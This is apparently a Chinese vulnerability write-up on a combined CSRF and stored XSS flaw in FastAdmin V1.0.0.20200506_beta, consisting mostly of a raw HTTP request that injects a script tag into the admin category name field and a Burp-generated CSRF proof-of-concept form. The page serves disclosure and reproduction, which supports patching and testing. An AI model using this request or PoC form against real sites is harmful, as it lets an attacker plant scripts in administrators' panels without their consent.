跳转至

FastAdmin csrf+存储型xss漏洞

一、漏洞简介

二、漏洞影响

V1.0.0.20200506_beta

三、复现过程

POST /admin.php/category/add?dialog=1 HTTP/1.1
Host: www.0-sec.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 233
Origin: https://www.0-sec.org
Connection: close
Referer: http://admin.com/admin.php/category/add?dialog=1
Cookie: PHPSESSID=ou6fjfn717lu02rfm9saqguca4; uid=3; token=f824ac8c-ac7b-4979-a89b-b47dd8e79226

row%5Btype%5D=default&row%5Bpid%5D=0&row%5Bname%5D=%3Cscript%3Ealert(1)%3C%2Fscript%3E&row%5Bnickname%5D=123&row%5Bimage%5D=1&row%5Bkeywords%5D=123&row%5Bdescription%5D=123&row%5Bweigh%5D=0&row%5Bstatus%5D=normal&row%5Bflag%5D%5B%5D=

csrf poc

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://www.0-sec.org/admin.php/category/add?dialog=1" method="POST">
      <input type="hidden" name="row[type]" value="default" />
      <input type="hidden" name="row[pid]" value="0" />
      <input type="hidden" name="row[name]" value="<script>alert(1)</script>" />
      <input type="hidden" name="row[nickname]" value="123" />
      <input type="hidden" name="row[image]" value="1" />
      <input type="hidden" name="row[keywords]" value="123" />
      <input type="hidden" name="row[description]" value="123" />
      <input type="hidden" name="row[weigh]" value="0" />
      <input type="hidden" name="row[status]" value="normal" />
      <input type="hidden" name="row[flag][]" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

1.png

2.png

参考链接

https://github.com/karsonzhang/fastadmin/issues/67